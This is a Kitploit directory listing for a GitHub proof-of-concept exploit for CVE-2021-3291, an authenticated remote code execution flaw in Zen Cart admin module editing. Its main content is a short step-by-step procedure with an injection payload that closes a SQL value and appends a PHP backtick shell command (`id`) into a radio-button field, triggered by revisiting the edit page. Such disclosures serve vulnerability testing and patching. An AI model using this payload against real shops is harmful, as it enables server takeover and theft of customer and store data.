Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
zencart_auth_rce_poc — Authenticated remote code execution exploit for Zen Cart via SQL injection in admin module editing. Proof-of-concept for CVE-2021-3291. | Kitploit
Tools/GitHubGitHub/kaanaryoverflow/zencart_auth_rce_poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubkaanaryoverflow/zencart_auth_rce_poc

zencart_auth_rce_poc

Authenticated remote code execution exploit for Zen Cart via SQL injection in admin module editing. Proof-of-concept for CVE-2021-3291.

View Repository
7245 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

zencart_auth_rce_poc CVE-2021-3291

1-) login as admin

2-) get any modules edit page

3-) inspect element any true radiobox

4-) change true to true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //

5-) click update

6-) to trig command go again edit page

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

POC

exploiting send command refresh page refresh page zoom

zoom

Metasploit

Ekran görüntüsü 2021-01-27 00-03-55

GIF

kanit

Download Tool